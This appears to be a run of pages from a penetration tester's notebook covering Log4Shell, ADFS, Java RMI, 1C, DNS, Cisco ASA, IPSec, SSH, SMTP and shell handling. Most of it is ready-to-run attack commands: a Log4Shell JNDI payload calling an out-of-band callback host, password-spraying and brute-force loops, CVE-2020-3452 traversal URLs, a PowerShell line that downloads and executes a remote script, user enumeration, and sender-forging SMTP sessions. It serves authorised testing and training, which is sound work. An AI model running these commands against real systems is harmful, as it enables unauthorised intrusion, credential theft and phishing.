IAT)](https://0xrick.github.io/win-internals/pe6/) * [A dive into the PE file format - PE file structure - Part 6: PE Base Relocations](https://0xrick.github.io/win-internals/pe7/) * [A dive into the PE file format - LAB 1: Writing a PE Parser](https://0xrick.github.io/win-internals/pe8/) ### [](https://ppn.snovvcra.sh/red-team/dev#malware-development-0xpat) Malware development (0xPat) * [Malware development part 1 - basics](https://0xpat.github.io/Malware_development_part_1/) * [Malware development part 2 - anti dynamic analysis & sandboxes](https://0xpat.github.io/Malware_development_part_2/) * [Malware development part 3 - anti-debugging](https://0xpat.github.io/Malware_development_part_3/) * [Malware development part 4 - anti static analysis tricks](https://0xpat.github.io/Malware_development_part_4/) * [Malware development part 5 - tips & tricks](https://0xpat.github.io/Malware_development_part_5/) * [Malware development part 6 - advanced obfuscation with LLVM and template metaprogramming](https://0xpat.github.io/Malware_development_part_6/) * [Malware development part 7 - Secure Desktop keylogger](https://0xpat.github.io/Malware_development_part_7/) * [Malware development part 8 - COFF injection and in-memory execution](https://0xpat.github.io/Malware_development_part_8/) * [Malware development part 9 - hosting CLR and managed code injection](https://0xpat.github.io/Malware_development_part_9/) ### [](https://ppn.snovvcra.sh/red-team/dev#windows-apt-warfare-sheng-hao-ma) Windows APT Warfare (Sheng-Hao Ma) * [https://www.packtpub.com/product/windows-apt-warfare/9781804618110](https://www.packtpub.com/product/windows-apt-warfare/9781804618110) * [https://github.com/PacktPublishing/Windows-APT-Warfare](https://github.com/PacktPublishing/Windows-APT-Warfare) * [https://habr.com/ru/articles/766760/](https://habr.com/ru/articles/766760/) * [https://xss.is/threads/87501/](https://xss.is/threads/87501/) ### [](https://ppn.snovvcra.sh/red-team/dev#malware-development-for-dummies-cas-van-cooten) Malware Development for Dummies (Cas van Cooten) * [\[PDF\] Malware Development for Dummies (Cas van Cooten)](https://github.com/chvancooten/maldev-for-dummies/blob/main/Slides/Malware%20Development%20for%20Dummies%20-%20Hack%20in%20Paris%2030-06-2022%20%26%2001-07-2022.pdf) * [https://github.com/chvancooten/maldev-for-dummies](https://github.com/chvancooten/maldev-for-dummies) ### [](https://ppn.snovvcra.sh/red-team/dev#learning-llvm-sh4dy) Learning LLVM (sh4dy) * [https://sh4dy.com/2024/06/29/learning\_llvm\_01/](https://sh4dy.com/2024/06/29/learning_llvm_01/) * [https://sh4dy.com/2024/07/06/learning\_llvm\_02/](https://sh4dy.com/2024/07/06/learning_llvm_02/) * [https://github.com/0xSh4dy/learning\_llvm](https://github.com/0xSh4dy/learning_llvm) Last updated 8 months ago * [Blog Series / Books](https://ppn.snovvcra.sh/red-team/dev#blog-series-books) * [PE Structure (+ PEB/LDR)](https://ppn.snovvcra.sh/red-team/dev#pe-structure--peb-ldr) * [Malware development (0xPat)](https://ppn.snovvcra.sh/red-team/dev#malware-development-0xpat) * [Windows APT Warfare (Sheng-Hao Ma)](https://ppn.snovvcra.sh/red-team/dev#windows-apt-warfare-sheng-hao-ma) * [Malware Development for Dummies (Cas van Cooten)](https://ppn.snovvcra.sh/red-team/dev#malware-development-for-dummies-cas-van-cooten) * [Learning LLVM (sh4dy)](https://ppn.snovvcra.sh/red-team/dev#learning-llvm-sh4dy) Copy $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" -f raw -o eikar.bin --- # Log4j / Log4Shell | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/log4j-log4shell.md) . * [https://github.com/kozmer/log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc) [](https://ppn.snovvcra.sh/pentest/perimeter/log4j-log4shell#log4jhorizon) Log4jHorizon -------------------------------------------------------------------------------------------- * [https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return](https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return) * [https://github.com/puzzlepeaches/Log4jHorizon](https://github.com/puzzlepeaches/Log4jHorizon) Check with [DNSLog](http://dnslog.cn/) : Copy $ curl -vvk https://vdi.exmaple.com/portal/info.jsp -H 'Accept-Language: ${jndi:ldap://zcf4r9z7oxec13t7fu1k14n0vr1ip8dx.oastify.com:1337/test}' Last updated 3 years ago --- # ADFS | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/adfs.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/adfs#tools) Tools ------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/perimeter/adfs#adfspray) ADFSpray * [https://github.com/xFreed0m/ADFSpray](https://github.com/xFreed0m/ADFSpray) Spray at autodiscover (NTLM auth) endpoint: Copy $ python3 ADFSpray.py -U users.txt -p 'Passw0rd!' -t 'https://autodiscover.megacorp.com/autodiscover/autodiscover.xml' autodiscover ### [](https://ppn.snovvcra.sh/pentest/perimeter/adfs#adfsbrute) adfsbrute * [https://github.com/ricardojoserf/adfsbrute](https://github.com/ricardojoserf/adfsbrute) Last updated 3 years ago * [Tools](https://ppn.snovvcra.sh/pentest/perimeter/adfs#tools) * [ADFSpray](https://ppn.snovvcra.sh/pentest/perimeter/adfs#adfspray) * [adfsbrute](https://ppn.snovvcra.sh/pentest/perimeter/adfs#adfsbrute) --- # Java RMI | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#enumerate) Enumerate ------------------------------------------------------------------------------- Check if class loader is enabled: Copy msf > use auxiliary/scanner/misc/java_rmi_server msf > set RHOSTS file:java_rmi.txt msf > set THREADS 25 msf > run Dump registry with MSF: Copy msf > use auxiliary/gather/java_rmi_registry msf > set RHOSTS file:java_rmi.txt msf > run Dump registry with Nmap: Copy $ sudo nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" 192.168.1.11 -p1098 [](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#barmie) BaRMIe ------------------------------------------------------------------------- * [https://github.com/NickstaDB/BaRMIe](https://github.com/NickstaDB/BaRMIe) Copy $ java -jar BaRMIe.jar -enum 192.168.1.11 1098 $ java -jar BaRMIe.jar -attack 192.168.1.11 1098 [](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#remote-method-guesser) remote-method-guesser ------------------------------------------------------------------------------------------------------- * [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) [](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#rmiscout) rmiscout ----------------------------------------------------------------------------- * [https://github.com/BishopFox/rmiscout](https://github.com/BishopFox/rmiscout) Last updated 3 years ago * [Enumerate](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#enumerate) * [BaRMIe](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#barmie) * [remote-method-guesser](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#remote-method-guesser) * [rmiscout](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi#rmiscout) Copy $ java -jar rmg-3.0.0-jar-with-dependencies.jar 192.168.1.11 1098 enum --- # 1C | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/1c.md) . * [https://t.me/webpwn/280](https://t.me/webpwn/280) * [https://habr.com/ru/post/352566/](https://habr.com/ru/post/352566/) * [https://www.rbsoft.ru/kb/upravlenie-spiskami-baz-1s/](https://www.rbsoft.ru/kb/upravlenie-spiskami-baz-1s/) * [https://ardent101.github.io/posts/1c/](https://ardent101.github.io/posts/1c/) * [https://www.pentestnotes.ru/notes/bitrix\_pentest\_full/](https://www.pentestnotes.ru/notes/bitrix_pentest_full/) * [\[PDF\] Уязвимости и атаки на CMS Bitrix (by @crlf)](https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf) [](https://ppn.snovvcra.sh/pentest/perimeter/1c#id-1c-enterprise) 1C:Enterprise ------------------------------------------------------------------------------------ Desktop clients' DB config is stored in `C:\Users\\AppData\Roaming\1C\1CEStart\ibases.v8i`: Copy Cmd > notepad.exe %APPDATA%\1C\1CEStart\ibases.v8i PS > gc $env:APPDATA\1C\1CEStart\ibases.v8i -Encoding UTF8 List all users existing in a DB that is published as a web app: Copy $ curl -sSLk https://1c.megacorp.com//en_US/e1cib/users $ curl -sSLk https://1c.megacorp.com//ru_RU/e1cib/users [](https://ppn.snovvcra.sh/pentest/perimeter/1c#id-1c-bitrix) 1C-Bitrix ---------------------------------------------------------------------------- * [https://github.com/indigo-sadland/quick-tricks](https://github.com/indigo-sadland/quick-tricks) * [https://pentestnotes.ru/notes/bitrix\_pentest\_full/](https://pentestnotes.ru/notes/bitrix_pentest_full/) [](https://ppn.snovvcra.sh/pentest/perimeter/1c#tools) Tools ----------------------------------------------------------------- * [https://github.com/KraudSecurity/1C-Exploit-Kit](https://github.com/KraudSecurity/1C-Exploit-Kit) * [https://gist.github.com/snovvcrash/632ac474abf90216aecf01c212251cca](https://gist.github.com/snovvcrash/632ac474abf90216aecf01c212251cca) * [https://github.com/durck/wb1c](https://github.com/durck/wb1c) Last updated 1 year ago * [1C:Enterprise](https://ppn.snovvcra.sh/pentest/perimeter/1c#id-1c-enterprise) * [1C-Bitrix](https://ppn.snovvcra.sh/pentest/perimeter/1c#id-1c-bitrix) * [Tools](https://ppn.snovvcra.sh/pentest/perimeter/1c#tools) --- # DNS | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/dns.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/dns#whois) whois ------------------------------------------------------------------ IP/domain info, IP ranges: Copy $ whois [-h whois.example.com] example.com или 127.0.0.1 [](https://ppn.snovvcra.sh/pentest/perimeter/dns#dig) dig -------------------------------------------------------------- General: Copy $ dig [@dns.example.com] example.com [{any,a,mx,ns,soa,txt,...}] $ dig -x example.com [+short] [+timeout=1] * [https://viewdns.info/reverseip/](https://viewdns.info/reverseip/) Zone transfer: Copy $ dig axfr @dns.example.com example.com $ for srv in `cat dns.txt`; do dig axfr "@$srv" example.com | grep "failed" > /dev/null 2>&1 || echo $srv; done [](https://ppn.snovvcra.sh/pentest/perimeter/dns#nslookup) nslookup ------------------------------------------------------------------------ Copy $ nslookup example.com [ns.example.com] $ nslookup -type=ptr 127.0.0.1 $ nslookup [> server dns.example.com] > set q=mx > example.com $ nslookup > set q=ptr > 127.0.0.1 [](https://ppn.snovvcra.sh/pentest/perimeter/dns#dns-amplification) DNS Amplification ------------------------------------------------------------------------------------------ Check: Last updated 3 years ago * [whois](https://ppn.snovvcra.sh/pentest/perimeter/dns#whois) * [dig](https://ppn.snovvcra.sh/pentest/perimeter/dns#dig) * [nslookup](https://ppn.snovvcra.sh/pentest/perimeter/dns#nslookup) * [DNS Amplification](https://ppn.snovvcra.sh/pentest/perimeter/dns#dns-amplification) Copy $ host facebook.com ns.example.com $ dig +short @ns.example.com test.openresolver.com TXT $ for srv in `cat dns.txt` do dig +short @$srv test.openresolver.com TXT | grep "open-resolver-detected" && echo "[+] $srv" || echo "[-] $srv" done $ sudo nmap -Pn -sU -sV --script dns-recursion -iL dns.txt -p53 $ for srv in `cat dns.txt` do sudo nmap -Pn -sU -sV --script dns-recursion $srv -p53 | pipe> grep "enabled" && echo "[+] $srv" || echo "[-] $srv" done msf > use auxiliary/scanner/dns/dns_amp --- # Cisco | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/cisco.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/cisco#brute-force-authentication) Brute Force Authentication -------------------------------------------------------------------------------------------------------------- * [https://github.com/R3dy/ciscobruter](https://github.com/R3dy/ciscobruter) Manually in a dirty way: Copy $ for user in `cat users.txt`; do echo 'Passw0rd!' | sudo openconnect vpn.contoso.com --user=$user --passwd-on-stdin --servercert=pin-sha256: | tee -a openconnect.log; done [](https://ppn.snovvcra.sh/pentest/perimeter/cisco#asa-path-traversal) ASA Path Traversal ---------------------------------------------------------------------------------------------- **CVE-2020-3452** Check manually: Copy https://cisco.example.com/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua https://cisco.example.com/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Check with MSF: Copy msf > use auxiliary/scanner/http/cisco_directory_traversal msf > set RHOSTS file:cisco.txt msf > run Potentially existent files to prove the vulnerability: Copy apcf app_index.html appstart.js appstatus ask.html auth.html blank.html ced.html cedf.html cedhelp.html cedlogon.html cedmain.html cedportal.html cedsave.html clear_cache color_picker.html color_picker.js common.js commonspawn.js connection_failed_form cookie custom do_url files gp-gip.html help home http_auth.html include lced.html localization_inc.lua logo.gif logon.html logon_custom.css logon_forms.js logon_redirect.html logout.html no_svc.html noportal.html nostcaccess.html ping.html pluginlib.js portal.css portal.html portal.js portal_ce.html portal_custom.css portal_elements.html portal_forms.js portal_img portal_inc.lua preview.html relayjar.html relaymonjar.html relaymonocx.html relayocx.html sdesktop sess_update.html session.js session_expired session_password.html shshim svc.html test_chargen tlbr tunnel_linux.jnlp tunnel_mac.jnlp ucte_forbidden_data ucte_forbidden_url user_dialog.html useralert.html win.js wrong_url.html Last updated 3 years ago * [Brute Force Authentication](https://ppn.snovvcra.sh/pentest/perimeter/cisco#brute-force-authentication) * [ASA Path Traversal](https://ppn.snovvcra.sh/pentest/perimeter/cisco#asa-path-traversal) --- # IPSec | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/ipsec.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#ike) IKE ---------------------------------------------------------------- * [https://xakep.ru/2015/05/13/ipsec-security-flaws/](https://xakep.ru/2015/05/13/ipsec-security-flaws/) * [https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting](https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting) * [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cracking-ike-missionimprobable-part-1/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cracking-ike-missionimprobable-part-1/) * [https://github.com/SpiderLabs/ikeforce](https://github.com/SpiderLabs/ikeforce) ### [](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#get-transform-set) Get Transform Set Using `ikeforce.py`: Copy $ sudo python ikeforce.py 10.10.13.37 -a Using ike-scan via brute force. Generate list of all transform-sets: Copy $ for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "$ENC,$HASH,$AUTH,$GROUP" >> trans-dict.txt; done; done; done; done Brute force supported transform-sets: Copy $ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M --trans=$t 10.10.13.37) |grep -B14 "1 returned handshake" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt Or (for aggressive mode) $ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M -A -P'handshake.txt' -n FAKEID --trans=$t 10.10.13.37) |grep -B7 "SA=" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt Or $ sudo python ikeforce.py -s1 -a 10.10.13.37 # -s1 for max speed ### [](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#get-vendor-info) Get Vendor Info Get information about vendor: ### [](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#test-for-aggressive-mode) Test for Aggressive Mode Test for aggressive mode ON: ### [](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#brute-force-group-id) Brute Force Group ID If no hash value is returned then brute force is (maybe also) possible: Dictionaries: * `/usr/share/seclists/Miscellaneous/ike-groupid.txt` * `~/tools/ikeforce/wordlists/groupnames.dic` Last updated 4 years ago * [IKE](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#ike) * [Get Transform Set](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#get-transform-set) * [Get Vendor Info](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#get-vendor-info) * [Test for Aggressive Mode](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#test-for-aggressive-mode) * [Brute Force Group ID](https://ppn.snovvcra.sh/pentest/perimeter/ipsec#brute-force-group-id) Copy $ sudo ike-scan -M --showbackoff [--trans=] 10.10.13.37 Copy $ sudo ike-scan -M -A -P -n FAKEID [--trans=] 10.10.13.37 Copy $ while read id; do (echo "[+] Valid ID: $id" && sudo ike-scan -M -A -n $id --trans= 10.10.13.37) | grep -B14 "1 returned handshake" | grep "Valid ID" |tee -a group-id.txt; done < dict.txt Or $ sudo python ikeforce.py 10.10.13.37 -e -w wordlists/groupnames.dic -t --- # SSH | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/ssh.md) . [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fwww.sans.org%2Ficon1.png%3F2951f2f1b780f8ac&width=20&dpr=3&quality=100&sign=e88d4dc7&sv=2)Using the SSH "Konami Code" (SSH Control Sequences)SANS Institute](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/) [](https://ppn.snovvcra.sh/pentest/perimeter/ssh#brute-force) Brute Force ------------------------------------------------------------------------------ * [https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer](https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer) From Windows: [](https://ppn.snovvcra.sh/pentest/perimeter/ssh#password-spray-key-spray) Password Spray / Key Spray ---------------------------------------------------------------------------------------------------------- * [https://github.com/mcorybillington/sshspray](https://github.com/mcorybillington/sshspray) A list of targets with different SSH ports: Spray with a private key and passphrase `Passw0rd!` using CME: Using sshspray: Using Nmap: [](https://ppn.snovvcra.sh/pentest/perimeter/ssh#enum-users) Enum Users ---------------------------------------------------------------------------- **CVE-2018-15473** Last updated 1 year ago * [Brute Force](https://ppn.snovvcra.sh/pentest/perimeter/ssh#brute-force) * [Password Spray / Key Spray](https://ppn.snovvcra.sh/pentest/perimeter/ssh#password-spray-key-spray) * [Enum Users](https://ppn.snovvcra.sh/pentest/perimeter/ssh#enum-users) Copy PS > curl https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe -o plink.exe PS > IEX(New-Object Net.WebClient).DownloadString("https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer/raw/master/ssh-putty-brute.ps1") PS > ssh-putty-brute -h 192.168.1.11 -p 22 -u root -pw 'Passw0rd!' PS > ssh-putty-brute -h 192.168.1.11 -p 22 -u root -pw (gc .\passwords.txt) Copy $ das parse ssh -raw | cut -c 7- | awk -F: '{print $1}' > ssh_hosts $ das parse ssh -raw | cut -c 7- | awk -F: '{print $2}' > ssh_ports $ paste ssh_hosts ssh_ports | while read host port; do cme ssh $host -u root -p root --port $port; done Copy $ cme ssh 192.168.1.11 -u root -p 'Passw0rd!' --key-file id_rsa Copy $ python3 sshspray.py -u root -i ~/.ssh/id_rsa -t ssh.txt $ parallel --eta -j3 python3 sshspray.py -i {} -u root -t ssh.txt ">" output_{}.log ::: id_rsa1 id_rsa2 id_rsa3 Copy $ nmap -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'root', 'user'}, ssh.privatekeys={'./id_rsa1', './id_rsa2'}" 192.168.1.11 Copy msf > use auxiliary/scanner/ssh/ssh_enumusers msf > set CHECK_FALSE true msf > set RHOSTS file:ssh.txt msf > set THREADS 25 msf > set USERNAME root msf > run --- # Authentication Brute Force | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#hydra) Hydra ---------------------------------------------------------------------------------------------- Copy $ hydra -V -t 20 -f -I -L logins.lst -P /usr/share/john/password.lst 127.0.0.1 -s 8888 smtp $ hydra -V -t 20 -f -I -l admin -P /usr/share/john/password.lst 127.0.0.1 -s 8888 ftp [](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#patator) Patator -------------------------------------------------------------------------------------------------- Copy $ patator smtp_login host=127.0.0.1 port=8888 user=FILE0 password=FILE1 0=logins.lst 1=/usr/share/john/password.lst -x ignore:mesg='(515) incorrect password or account name' -x free=user:code=0 $ patator ftp_login host=127.0.0.1 port=8888 user=admin password=FILE0 0=/usr/share/john/password.lst -x ignore:mesg='Login incorrect.' -x free=user:code=0 [](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#crowbar) crowbar -------------------------------------------------------------------------------------------------- * [https://github.com/galkan/crowbar](https://github.com/galkan/crowbar) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#rdp) RDP Copy $ crowbar -b rdp -s 192.168.1.0/24 -u snovvcrash -c 'Passw0rd!' -l ~/ws/log/crowbar.log -o ~/ws/log/crowbar.out Last updated 3 years ago * [Hydra](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#hydra) * [Patator](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#patator) * [crowbar](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#crowbar) * [RDP](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force#rdp) --- # Perimeter | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter.md) . * [https://pentest-tools.com/home](https://pentest-tools.com/home) * [https://hackertarget.com/ip-tools/](https://hackertarget.com/ip-tools/) * DNS * `$ nslookup example.com` * Subdomains & AXFR * AS details * $ `whois example.com` * $ `whois 127.0.0.1` * Check for DNS Amplification * CMS, Stack, Vulns * WhatWeb, Wappalyzer * Shodan / Censys / SecurityTrails * Google Dorks * `/robots.txt` * `/sitemap.xml` [](https://ppn.snovvcra.sh/pentest/perimeter#autonomous-systems) Autonomous Systems ---------------------------------------------------------------------------------------- * [https://hackware.ru/?p=9245](https://hackware.ru/?p=9245) ### [](https://ppn.snovvcra.sh/pentest/perimeter#info-via-ip) Info via IP dig: whois: ### [](https://ppn.snovvcra.sh/pentest/perimeter#info-via-asn) Info via ASN whois: ### [](https://ppn.snovvcra.sh/pentest/perimeter#search-as) Search AS * [https://radar.qrator.net/search?query=AS31337](https://radar.qrator.net/search?query=AS31337) * [https://github.com/nitefood/asn](https://github.com/nitefood/asn) Map IP addresses to AS by `origin` and `netname` ignoring potentionally unwanted `netname` values by keywords: One-liner providing the input from [DivideAndScan](https://github.com/snovvcrash/DivideAndScan) : Using [ansmap](https://github.com/projectdiscovery/asnmap) : Difference between as-name, aut-num, origin, netname, etc. may be found on [RIPE](https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/@@fullbodyrecursive-view) . Last updated 3 years ago * [Autonomous Systems](https://ppn.snovvcra.sh/pentest/perimeter#autonomous-systems) * [Info via IP](https://ppn.snovvcra.sh/pentest/perimeter#info-via-ip) * [Info via ASN](https://ppn.snovvcra.sh/pentest/perimeter#info-via-asn) * [Search AS](https://ppn.snovvcra.sh/pentest/perimeter#search-as) Copy $ dig $(dig -x 127.0.0.1 | grep PTR | tail -n 1 | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}').origin.asn.cymru.com TXT +short Copy $ whois -h whois.cymru.com -- '-v 127.0.0.1' $ whois -h whois.radb.net 127.0.0.1 Copy $ whois -h whois.cymru.com -- '-v AS48666' $ whois -h whois.radb.net AS48666 whois.sh Copy #!/bin/bash # Usage: whois.sh ip_list.txt for ip in `cat $1`; do WHOIS=`whois $ip` ASNUM=`echo $WHOIS | grep -i "origin:" | tr -d ' ' | cut -d ":" -f 2 | tr $'\n' ','` NETNAME=`echo $WHOIS | grep -i "netname:" | tr -d ' ' | cut -d ":" -f 2` if ! echo "$NETNAME" | grep -iqF -e pppoe -e ipoe; then echo "$ASNUM,$NETNAME,$ip" fi done Copy $ for i in `das -db corp scan -ports all -show -raw | sort -u`; do whois $i | grep -e org-name: -e netname: -e route: -e origin:; echo ---; done Copy $ asnmap -i `das -db corp scan -ports all -show -raw | sort -u | sed -z 's/\n/,/g;s/,$/\n/'` -silent $ asnmap -d `cat domains.txt | sed -z 's/\n/,/g;s/,$/\n/'` -silent --- # SMTP | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/smtp.md) . Check if sender could be [forged](https://en.wikipedia.org/wiki/Callback_verification) with an domain user: Copy $ telnet mail.example.com 25 HELO example.com MAIL FROM: RCPT TO: RCPT TO: Check if sender could be forged with a non-domain user: Copy $ telnet mail.example.com 25 HELO example.com MAIL FROM: RCPT TO: RCPT TO: Check if domain users could be enumerated with `VRFY` and `EXPN`: Copy $ telnet mail.example.com 25 HELO example.com VRFY exists@example.com EXPN exists@example.com Check if users could be enumerated with `RCPT TO`: Copy $ telnet mail.example.com 25 HELO example.com MAIL FROM: <...> RCPT TO: DATA From: <...> To: Subject: Job offer Hello, I would like to offer you a great job! . QUIT [](https://ppn.snovvcra.sh/pentest/perimeter/smtp#rcpt) RCPT ----------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/perimeter/smtp#smtp-enum) smtp-enum * [https://github.com/z0mbiehunt3r/smtp-enum](https://github.com/z0mbiehunt3r/smtp-enum) ### [](https://ppn.snovvcra.sh/pentest/perimeter/smtp#smtp-user-enum) smtp-user-enum * [https://github.com/pentestmonkey/smtp-user-enum](https://github.com/pentestmonkey/smtp-user-enum) [](https://ppn.snovvcra.sh/pentest/perimeter/smtp#spf-dkim-dmarc) SPF/DKIM/DMARC ------------------------------------------------------------------------------------- * [https://postmarkapp.com/guides/spf](https://postmarkapp.com/guides/spf) * [https://www.mailigen.ru/blog/chto-takoe-spf-dkim-i-dmarc-i-pochemu-oni-obyazatelno-dolzhny-byt-propisany/](https://www.mailigen.ru/blog/chto-takoe-spf-dkim-i-dmarc-i-pochemu-oni-obyazatelno-dolzhny-byt-propisany/) * [https://github.com/BishopFox/spoofcheck](https://github.com/BishopFox/spoofcheck) [](https://ppn.snovvcra.sh/pentest/perimeter/smtp#tools) Tools ------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/perimeter/smtp#swaks) swaks * [https://github.com/jetmore/swaks](https://github.com/jetmore/swaks) Last updated 3 years ago * [RCPT](https://ppn.snovvcra.sh/pentest/perimeter/smtp#rcpt) * [smtp-enum](https://ppn.snovvcra.sh/pentest/perimeter/smtp#smtp-enum) * [smtp-user-enum](https://ppn.snovvcra.sh/pentest/perimeter/smtp#smtp-user-enum) * [SPF/DKIM/DMARC](https://ppn.snovvcra.sh/pentest/perimeter/smtp#spf-dkim-dmarc) * [Tools](https://ppn.snovvcra.sh/pentest/perimeter/smtp#tools) * [swaks](https://ppn.snovvcra.sh/pentest/perimeter/smtp#swaks) Copy $ ./main.py -d megacorp.com -s 10.10.13.37 -f accounts.txt -m rcptto -o valid.txt Copy $ smtp-user-enum -M RCPT -f '' -u '' -t mx.megacorp.com $ smtp-user-enum -M RCPT -D megacorp.com -U users.txt -t mx.megacorp.com Copy $ swaks --to j.doe@megacorp.com --from snovvcrash@megacorp.com --header 'Subject: Hello, friend' --body 'Hack the Planet!' --server 192.168.1.11 --attach hello.doc --- # Shells | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/shells.md) . [](https://ppn.snovvcra.sh/pentest/shells#upgrade-to-pty) Upgrade to PTY ----------------------------------------------------------------------------- * [https://forum.hackthebox.eu/discussion/comment/22312#Comment\_22312](https://forum.hackthebox.eu/discussion/comment/22312#Comment_22312) * [https://xakep.ru/2019/07/16/mischief/#toc05.1](https://xakep.ru/2019/07/16/mischief/#toc05.1) * [https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/](https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/) * [https://infosecwriteups.com/using-tmux-for-automating-interactive-reverse-shells-630260740af3](https://infosecwriteups.com/using-tmux-for-automating-interactive-reverse-shells-630260740af3) Copy # Spawn PTY $ if python3 -V > /dev/null 2>&1; then python3 -c 'import pty; pty.spawn("/bin/bash")' elif python -V > /dev/null 2>&1; then python -c 'import pty; pty.spawn("/bin/bash")' fi Or $ script -q /dev/null /bin/bash # Background remote shell user@remote:~$ ^Z # Get rows and cols from local terminal root@kali:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' # Disable local output in terminal root@kali:~$ stty raw -echo; fg # (optional) Reset remote terminal 